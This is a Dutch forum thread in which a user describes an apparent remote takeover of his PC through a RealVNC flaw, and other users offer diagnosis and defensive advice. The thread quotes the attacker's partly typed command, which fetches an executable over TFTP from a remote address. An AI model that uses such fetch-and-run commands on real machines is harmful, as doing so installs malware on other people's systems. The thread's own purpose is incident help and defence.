Ben ik gehacked? - Privacy en beveiliging

vrijdag 22 september 2006 00:01

Acties:

Topicstarter

Het klinkt misschien heel raar en n00b maar ik heb het idee...nouja ik weet het wel zeker dat ik zojuist gehacked ben.

Ik was een potje Half Life 2 Episode One aan het spelen terwijl mijn systeem terugschoot noor windows, als een alt-tab ofzo. Ik wilde snel terug alt-tabben totdat ik tot mijn verbazing zag dat mijn 'uitvoeren' box open stond met wat tekst erin: tftp -i 84.27.22.
Ik had meteen het gevoel dat er iets niet goed zat maar ik wachte even en deed niets. Toen werd er verder getyped. En toen hield ik het helemaal voor gezien en heb onmiddelijk mijn UTP kabel uit mijn pc getrokken.
De volledige command line tot het moment dat ik de kabel eruit trok was:

tftp -i 84.27.22winlolx.exe1.

Ik ben dus vrij zeker dat dit een hacker is geweest. Heeft iemand een idee hoe hij in mijn systeem gekomen zou kunnen zijn. Is dit een trojan? Wat betekend de command line en vooral hoe kan ik me beter beveiligen. Ik heb winxp sp met een firewall van win xp, een antivirus programma en ik zit achter een linksys router met firewall...

plz help me..

Yesterday's home runs don't win today's games. - Babe Ruth

vrijdag 22 september 2006 00:02

Acties:

Verwijderd

-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.

Maw getracht een file via ftp binnen te trekken en die te executen

vrijdag 22 september 2006 00:03

Acties:

Flapp

tftp is een file transfer protocol, dus waarschijnlijk probeerde hij iets te downloaden naar je pc...

Kan je anders even een hijackthislog posten om te kijken of er niet een of ander dubieus proces op de achtergrond draat..

Misschien ook handig om te vermelden of je pc in de dmz van je router staat of niet. en welk antivirus programma...

Verder lijkt het me iets als remote desktop achtig

[ Voor 27% gewijzigd door Flapp op 22-09-2006 00:05 ]

"Stilte, een gat in het geluid...."

vrijdag 22 september 2006 00:04

Acties:

Gerco

Professional Newbie

Draai je toevallig een VNC server? Er is een paar maanden geleden een lek ontdekt in sommige VNC distributies waardoor men zonder password kan inloggen. Inloggen met VNC zou kunnen veroorzaken dat je spel er plots mee kapt, dat je de aanvaller kon zien tikken is nog een 'dead giveaway'.

De oplossing: Installeer een nieuwe VNC versie of gooi hem er helemaal af. Als je helemaal zeker wilt zijn, moet je herinstalleren, maar ik denk dat je net op tijd bent geweest met het verwijderen van de netwerkstekker.

[ Voor 4% gewijzigd door Gerco op 22-09-2006 09:55 ]

- "Als ik zou willen dat je het begreep, legde ik het wel beter uit!" | All number systems are base 10!

vrijdag 22 september 2006 00:06

Acties:

DaTiezl

Topicstarter

Gerco schreef op vrijdag 22 september 2006 @ 00:04:
Draai je toevallig een VNC server? Er is een paar maanden geleden een lek ontdekt in sommige VNC distributies waardoor men zonder password kan inloggen. Inloggen met VNC zou kunnen veroorzaken dat je spel er plots mee kapt, dat je de aanvaller kon zien tikken is nog een 'dead giveaway'.

De oplossing: Installeer een nieuwe VNC versie of gooi hem er helemaal af. Als je helemaal zeker wilt zijn, moet je herinstalleren, maar ik denk dat je net op tijd bent geweest met het verwijderen van de netwerkstekker.

jup ik draai VNC..tnx ik ga het proberen!

Yesterday's home runs don't win today's games. - Babe Ruth

vrijdag 22 september 2006 00:06

Acties:

Admiral Freebee

Heeft het toevallig niet iets met dit te maken?
http://www.f-secure.com/v-descs/rpc.shtml

Waarschijnlijk niet... maar het kan nooit kwaad om even een spyware/virus/whatever scan te doen

[ Voor 41% gewijzigd door Admiral Freebee op 22-09-2006 00:10 ]

vrijdag 22 september 2006 00:07

Acties:

JvW

On my way home...

Heb je al een virus/spyware scan gedraaid na dit incident?
En wellicht kun je de shields-up test doen op www.grc.com

Misschien hebben er in je firewall programma's toestemming om verbinding te maken met internet (inkomend & uitgaand), waar dat niet direct nodig is. Trek deze toestemming dan weer in.

“What could I say to you that would be of value, except that perhaps you seek too much, that as a result of your seeking you cannot find.” - Hermann Hesse

vrijdag 22 september 2006 00:08

Acties:

Zerora

Ik Henk 'm!

Je hebt toch wel direct gezocht/gescand naar een bestand met de naam: winlolx.exe

Dat command lijkt op dat ie het bestand winlolx.exe van een IP adres waar een TFTP server aanhangt probeerd te downloaden. Die 1 duid dan waarschijnlijk op een parameter oid binnen die exe-file.

Dit zou weleens een virus/spyware/etc.. kunnen zijn. Bestand verwijderen dus van je pc.
Daarna zou ik nog je eens je virusscanner/spywarescanner in werking zetten

offtopic:
Laat met antwoorden

[ Voor 4% gewijzigd door Zerora op 22-09-2006 00:09 ]

Trans-life! :::: "All things change, whether from inside out or the outside in. That is what magic is. And we are magic too."

vrijdag 22 september 2006 00:10

Acties:

DaTiezl

Topicstarter

Zerora schreef op vrijdag 22 september 2006 @ 00:08:
Je hebt toch wel direct gezocht/gescand naar een bestand met de naam: winlolx.exe

Dat command lijkt op dat ie het bestand winlolx.exe van een IP adres waar een TFTP server aanhangt probeerd te downloaden. Die 1 duid dan waarschijnlijk op een parameter oid binnen die exe-file.

Dit zou weleens een virus/spyware/etc.. kunnen zijn. Bestand verwijderen dus van je pc.
Daarna zou ik nog je eens je virusscanner/spywarescanner in werking zetten

ik heb erop gezocht. Niet gevonden. Ook heb ik Anti-spyware gedraait...niet gevonden Antivirus is nog aan het draaien...we spreken nu 10min na de attack

edit: als antivirus draai ik eTrust EZ Antivirus.

Btw tnx voor de snelle reacties. Ik heb een vermoede dat het indaad aan mijn RealVNC ligt. Loopt er een topic hier over die lek?

[ Voor 11% gewijzigd door DaTiezl op 22-09-2006 00:13 ]

Yesterday's home runs don't win today's games. - Babe Ruth

vrijdag 22 september 2006 09:47

Acties:

slaay

Natuurbeleven.com

Bij VNC kun je toch ook instellen dat de gebruiker achter het systeem eem melding krijgt en dan annuleren of toestaan.
Het lek in VNC kan dit ook omzeilen?
Zoniet, dan zet gewoon VNC aan en bijv. Ethereal.
Dan zie je meteen vanaf welk ip er verbinding wordt gemaakt.

Dich bis echt unne foëzen haas

vrijdag 22 september 2006 09:49

Acties:

moto-moi

Ja, ik haat jou ook :w

-> Beveiliging & Virussen

God, root, what is difference? | Talga Vassternich | IBM zuigt

vrijdag 22 september 2006 09:51

Acties:

Gerco

Professional Newbie

slaay schreef op vrijdag 22 september 2006 @ 09:47:
Bij VNC kun je toch ook instellen dat de gebruiker achter het systeem eem melding krijgt en dan annuleren of toestaan.
Het lek in VNC kan dit ook omzeilen?

Ja.

Zoniet, dan zet gewoon VNC aan en bijv. Ethereal.
Dan zie je meteen vanaf welk ip er verbinding wordt gemaakt.

Of je installeert gewoon de gefixte versie van VNC. Dan heb je er helemaal geen last meer van, wat moet je nu met het IP van een cracker?

- "Als ik zou willen dat je het begreep, legde ik het wel beter uit!" | All number systems are base 10!

vrijdag 22 september 2006 10:43

Acties:

Bart1983

Het moet haast wel het VNC lek zijn geweest. Er zijn veel mensen die dit zelfde probleem hebben gehad!!

FF beetje offtopic maar het valt me op dat hackers (script kiddies) vrij snel in de gate hebben als er op je computer een bepaalde port openstaat (FTP/VNC). Ik had toevallig gisteren even een ftp servertje geopend om een vriend van mij wat bestanden te sturen. Na een uurtje zag ik in eens in de log staan dat een wilt vreemde 1000de loggin attempts had gedaan met verschillende wachtwoorden (brute force ofzo). Gelukkig had ik maar 1 account aangemaakt met wachtwoord voor die vriend.

Wat ik hiermee dus wil zeggen dat er dus constant grote scans worden uitgevoerd in bepaalde ip ranges ofzo. Een goeie firewall is dus echt geen overbodige luxe al is het maar alleen om al je porten te stealthen en zo de hackers te laten denken dat er niets is.

[ Voor 7% gewijzigd door Bart1983 op 22-09-2006 10:47 ]

maandag 25 september 2006 08:58

Acties:

1Mark

stuur dat soort logs naar de abuse afdeling van je provider. Dan is diegene zo geblokkeerd en heeft ie een probleem (als je provider van aanpakken weet)

maandag 25 september 2006 09:03

Acties:

Verwijderd

markclausing schreef op maandag 25 september 2006 @ 08:58:
stuur dat soort logs naar de abuse afdeling van je provider. Dan is diegene zo geblokkeerd en heeft ie een probleem (als je provider van aanpakken weet)

zo snel zullen ze ook niemand blokken.

maar een melding geven aan je provider kan nooit kwaad.

maandag 25 september 2006 09:04

Acties:

Marzman

They'll never get caught.

markclausing schreef op maandag 25 september 2006 @ 08:58:
stuur dat soort logs naar de abuse afdeling van je provider. Dan is diegene zo geblokkeerd en heeft ie een probleem (als je provider van aanpakken weet)

Of hij wordt zelf afgesloten omdat hij zijn windows niet gepatched heeft. Ik zou gewoon een reinstall doen en (als je weet vanaf welk ipadres het kwam) een mailtje naar abuse@zijnprovider sturen.

☻/ Please consider the environment before printing this signature
/▌
/ \ <-- This is bob. copy and paste him and he will soon take over the world.

maandag 25 september 2006 09:07

Acties:

aZuL2001

Weet ik niet, via tftp een bestand proberen te uppen, terwijl je via een vnc lek toegang hebt verkregen lijkt mij toch heel erg richting computervredebreuk neigen.

Een beetje provider lost dat gelijk op. (mits dat ook het echte ipadres van de attacker was)

Abort, Retry, Quake ???

maandag 25 september 2006 09:12

Acties:

Phyxion

_/-\o_

aZuL2001 schreef op maandag 25 september 2006 @ 09:07:
Weet ik niet, via tftp een bestand proberen te uppen, terwijl je via een vnc lek toegang hebt verkregen lijkt mij toch heel erg richting computervredebreuk neigen.

Een beetje provider lost dat gelijk op. (mits dat ook het echte ipadres van de attacker was)

Weet je wat het is, ze werken al met gehackte boxen, en connecten via die boxen naar jou PC. Het heeft dus echt geen zin om dat te doen, want zeer waarschijnlijk report je het IP van een één of andere dedicated server

'You like a gay cowboy and you look like a gay terrorist.' - James May

maandag 25 september 2006 09:18

Acties:

aZuL2001

Daarom zette ik die opmerking ook tussen haakjes erbij.

Maar dan nog is het zaak om te raporteren, dan kan die eventuele gehackte box gefixt worden.

Abort, Retry, Quake ???

maandag 25 september 2006 09:22

Acties:

TrailBlazer

Karnemelk FTW

en vervoglens staat die box in Kazachstan en moet kazachstan telecom iets gaan ondernemen. Denk je echt dat jouw provider een ip adres gaat blokeren omdat jij je beveiliging niet op orde hebt. Wens ik ze veel plezier met alle administratie

maandag 25 september 2006 09:23

Acties:

Verwijderd

Het is trouwens verstandig de standaard poorten van programma's te veranderen op je computer of in de modem dmv NAT. Hiermee hou je al veel mensen buiten de deur.

[ Voor 3% gewijzigd door Verwijderd op 25-09-2006 09:24 ]

maandag 25 september 2006 09:32

Acties:

Phyxion

_/-\o_

TrailBlazer schreef op maandag 25 september 2006 @ 09:22:
en vervoglens staat die box in Kazachstan en moet kazachstan telecom iets gaan ondernemen. Denk je echt dat jouw provider een ip adres gaat blokeren omdat jij je beveiliging niet op orde hebt. Wens ik ze veel plezier met alle administratie

Ja, klopt, ze staan altijd wel in een land ver weg, zoals Rusland, VS, Japan, zulke landen zijn onbereikbaar voor hier

'You like a gay cowboy and you look like a gay terrorist.' - James May

maandag 25 september 2006 10:43

Acties:

Verwijderd

FnF schreef op maandag 25 september 2006 @ 09:32:
[...]

Ja, klopt, ze staan altijd wel in een land ver weg, zoals Rusland, VS, Japan, zulke landen zijn onbereikbaar voor hier

het adress is afkomstig uit deze vage landen ja, maar de echte hacker kan je buurman zijn.

maandag 25 september 2006 10:53

Acties:

Pascal

Verwijderd schreef op maandag 25 september 2006 @ 10:43:
[...]

het adress is afkomstig uit deze vage landen ja, maar de echte hacker kan je buurman zijn.

Name: *knip*

Dit lijkt me niet echt nodig hoor.

[ Voor 19% gewijzigd door pasta op 25-09-2006 13:52 ]

maandag 25 september 2006 14:47

Acties:

Phyxion

_/-\o_

Verwijderd schreef op maandag 25 september 2006 @ 10:43:
[...]

het adress is afkomstig uit deze vage landen ja, maar de echte hacker kan je buurman zijn.

Maar dat is immers altijd zo, hackers zorgen wel voor wat beveiliging voor eigen kant hoor

'You like a gay cowboy and you look like a gay terrorist.' - James May

dinsdag 26 september 2006 00:03

Acties:

DaTiezl

Topicstarter

Goed om weer enigzins ontopic te komen op mijn draadje...

markclausing schreef op maandag 25 september 2006 @ 08:58:
stuur dat soort logs naar de abuse afdeling van je provider. Dan is diegene zo geblokkeerd en heeft ie een probleem (als je provider van aanpakken weet)

...hoe kom ik aan die log want ik kaan geen logs vinden in mijn Linksys WRT54G...

Yesterday's home runs don't win today's games. - Babe Ruth

dinsdag 26 september 2006 00:10

Acties:

aZuL2001

Kijk eens in je eventviewer.

Verder had je een screenie moeten maken toen het gebeurde.

En heeft VNC geen logging ?

[ Voor 14% gewijzigd door aZuL2001 op 26-09-2006 00:11 . Reden: aanvulling ]

Abort, Retry, Quake ???

dinsdag 26 september 2006 00:14

Acties:

RammY

Dát!

Verwijderd schreef op maandag 25 september 2006 @ 10:43:
[...]

het adress is afkomstig uit deze vage landen ja, maar de echte hacker kan je buurman zijn.

Euh.. de 84.27.221.** range is toch echt een @Home uit Den Bosch range hoor...
Maargoed...
Hopelijk was het dan idd je VNC en ben je met een gepatchte versie klaar

Deze advertentieplaats is te huur!

dinsdag 26 september 2006 00:18

Acties:

Alex)

Wees maar blij dat de hacker niet koos voor "block remote input" en "block remote screen", dan had je niks meer kunnen doen. Maar goed, heb je al andere virusscanners geprobeerd dan EZ Antivirus?

(Ik heb trouwens een hekel aan alles met EZ in de naam, simpelweg omdat het dat nooit is)

We are shaping the future

dinsdag 26 september 2006 00:30

Acties:

the_stickie

Alex schreef op dinsdag 26 september 2006 @ 00:18:
Wees maar blij dat de hacker niet koos voor "block remote input" en "block remote screen", dan had je niks meer kunnen doen. Maar goed, heb je al andere virusscanners geprobeerd dan EZ Antivirus?

(Ik heb trouwens een hekel aan alles met EZ in de naam, simpelweg omdat het dat nooit is)

bwa; als je je utp kabel er uit haalt of je pc afsluit kan hi met z'n vnc sessietej ook niet veel meer beginnen hoor

dinsdag 26 september 2006 00:45

Acties:

Taenadar

Bart1983 schreef op vrijdag 22 september 2006 @ 10:43:
Het moet haast wel het VNC lek zijn geweest. Er zijn veel mensen die dit zelfde probleem hebben gehad!!

FF beetje offtopic maar het valt me op dat hackers (script kiddies) vrij snel in de gate hebben als er op je computer een bepaalde port openstaat (FTP/VNC). Ik had toevallig gisteren even een ftp servertje geopend om een vriend van mij wat bestanden te sturen. Na een uurtje zag ik in eens in de log staan dat een wilt vreemde 1000de loggin attempts had gedaan met verschillende wachtwoorden (brute force ofzo). Gelukkig had ik maar 1 account aangemaakt met wachtwoord voor die vriend.

Wat ik hiermee dus wil zeggen dat er dus constant grote scans worden uitgevoerd in bepaalde ip ranges ofzo. Een goeie firewall is dus echt geen overbodige luxe al is het maar alleen om al je porten te stealthen en zo de hackers te laten denken dat er niets is.

offtopic:
Die zogenaamde script kiddies hebben genoeg servers al gehackt die dagelijks bezig zijn met het afzoeken naar ip's met bepaalde poorten. Waarschijnlijk gebruikte je een standaard poort hiervoor en als deze word gevonden, word er een script gestart die een hele zooi aan paswoorden probeerd

Je hebt iig goed gehandeld om je stekker eruit te trekken

dinsdag 26 september 2006 00:57

Acties:

Thralas

Gebruik sowieso als het mogelijk is bij services als RealVNC een andere port dan de default. Scriptkiddies die hele ranges afscannen scannen waarschijnlijk alleen de default poort 5900. Mocht je VNC alleen maar gebruiken vanaf een handjevol IPs of ranges, gooi er dan een firewall op die alleen die ranges/IPs toelaat.

dinsdag 26 september 2006 09:20

Acties:

monnick

Waarschijnlijk inderdaad gehacked via VNC. In sommige versie zaten bugs en dan konden scanners scannen naar PC's met VNC die kwetsbaar waren en waar je zonder WW kon inloggen. Je kan VNC patchen, en ook even je PC scannen op mogelijk rootkits die de hacker naar jou heeft geupload.

En inderdaad zoals ik hierboven lees zijn er heel erg veel scriptkiddies bezig met constant range's te scannen op kwetsbare poorten. Vooral de standaartpoorten van VNC en SQL zijn erg populair.

[ Voor 25% gewijzigd door monnick op 26-09-2006 09:23 ]

woensdag 27 september 2006 21:00

Acties:

DaTiezl

Topicstarter

RammY schreef op dinsdag 26 september 2006 @ 00:14:
[...]

Euh.. de 84.27.221.** range is toch echt een @Home uit Den Bosch range hoor...
Maargoed...
Hopelijk was het dan idd je VNC en ben je met een gepatchte versie klaar

Mja dat is ook het begin van mijn ip...:p

Yesterday's home runs don't win today's games. - Babe Ruth

woensdag 27 september 2006 21:05

Acties:

Verwijderd

Daarom pas ik altijd voor zover mogelijk mijn poorten aan. Dus niet de standaard vnc poort etc.

Nou kan ik mij vergissen maar volgens mij maakt het dat net wat veiliger.

En altijd als ik weg ben voor langere tijd, of voor bepaalde tijd bepaalde services niet nodig heb (bijvoorbeeld ik weet van tevoren dat ik vandaag mijn ftp niet ga gebruiken), dan zet ik gewoon even de server uit, of zet ik hem dicht mbv de Kerio firewall.

[ Voor 43% gewijzigd door Verwijderd op 27-09-2006 21:07 ]

woensdag 27 september 2006 23:44

Acties:

RammY

Dát!

DaTiezl schreef op woensdag 27 september 2006 @ 21:00:
[...]

Mja dat is ook het begin van mijn ip...:p

offtopic:
hmm ok

sorry dan maar

Deze advertentieplaats is te huur!